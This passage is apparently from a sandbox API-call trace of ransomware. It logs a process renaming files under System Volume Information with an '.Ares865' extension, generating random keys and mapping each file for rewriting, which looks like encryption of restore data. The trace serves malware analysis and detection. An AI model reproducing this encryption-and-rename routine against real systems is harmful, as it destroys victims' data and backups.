Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29088c66-de5f-456f-85c0-6e4156f94358}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.703] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29088c66-de5f-456f-85c0-6e4156f94358}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0112.707] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.718] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.718] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.718] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0112.767] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0112.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.Ares865") returned 111 [0112.776] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.777] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.778] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.778] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.779] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.779] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.779] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.781] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.801] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.801] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.802] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.803] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.Ares865") returned 111 [0112.803] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.805] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.805] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0112.806] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.806] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.806] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.807] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0112.816] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0112.820] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.821] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.821] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.822] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.Ares865") returned 111 [0112.822] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.833] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.833] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.833] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.834] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.834] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.834] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.835] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.840] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.842] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.Ares865") returned 111 [0112.842] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.844] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{4204ee1b-0338-4788-b199-d83e4955faf1}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.844] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=376) returned 1 [0112.844] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.845] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x480, lpName=0x0) returned 0x170 [0112.850] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x190000 [0112.853] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.854] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.854] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.Ares865") returned 111 [0112.854] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.855] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.856] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.856] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.857] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.857] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.857] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.858] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.883] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.884] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.884] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.885] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.Ares865") returned 111 [0112.885] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.889] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{425865b3-1a09-4be3-8a97-1baffda74ed0}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0112.890] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.891] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.891] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.891] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0112.895] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0112.895] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.896] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.896] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.897] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.Ares865") returned 111 [0112.897] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.898] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.898] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.899] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.899] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.899] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.900] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.906] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.906] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.906] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.908] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.Ares865") returned 111 [0112.908] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.909] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.909] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0112.909] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.910] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.910] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.910] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0112.914] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0112.914] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.915] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.915] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.916] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.Ares865") returned 111 [0112.916] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.917] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.917] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.918] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.918] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.918] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.919] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.923] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.938] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.938] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.938] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.940] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.Ares865") returned 111 [0112.940] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.941] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{5ac56584-2304-47b9-b262-8d3164a52d9e}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.941] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0112.941] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.942] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.942] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.942] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0112.944] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0112.944] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 